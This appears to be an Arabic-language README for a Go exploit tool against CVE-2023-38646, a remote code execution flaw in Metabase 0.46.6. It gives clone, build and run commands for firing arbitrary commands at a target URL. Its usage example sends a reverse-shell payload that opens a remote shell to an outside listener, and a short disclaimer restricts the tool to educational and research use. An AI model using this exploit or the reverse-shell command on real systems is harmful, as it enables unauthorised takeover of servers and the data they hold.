
استغلال لثغرة CVE-2023-38646 في Metabase 0.46.6، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات مصممة خصيصًا واسترجاع رمز الإعداد.
أداة استغلال ثغرة CVE-2023-38646 في Metabase 0.46.6
تستغل هذه الأداة ثغرة أمنية (CVE-2023-38646) في منصة برمجية. تتيح الثغرة تنفيذ أوامر عن بُعد عبر طلب مُصمم بعناية، من خلال استغلال سوء التعامل مع سلسلة اتصال قاعدة البيانات.
تقوم الأداة بما يلي:
استنسخ المستودع:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: عنوان المنصة المراد فحصها واستغلالها. COMMAND: الأمر الذي سيتم تنفيذه على الهدف. PROXY_URL (اختياري): عنوان خادم الوكيل (مثل: http://127.0.0.1:8080). إذا لم يتم توفيره، فلن يتم استخدام أي وكيل.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
هذه الأداة مخصصة لأغراض تعليمية وبحثية فقط. تأكد دائمًا من حصولك على إذن مناسب قبل فحص أو استغلال أي هدف. إساءة استخدام هذه الأداة تتعارض تمامًا مع نية المطوّر وقد تكون غير قانونية.
لا تتردد في فتح قضايا (issues) لأي ملاحظات أو أخطاء أو طلبات ميزات. طلبات السحب (Pull requests) مرحب بها دائمًا!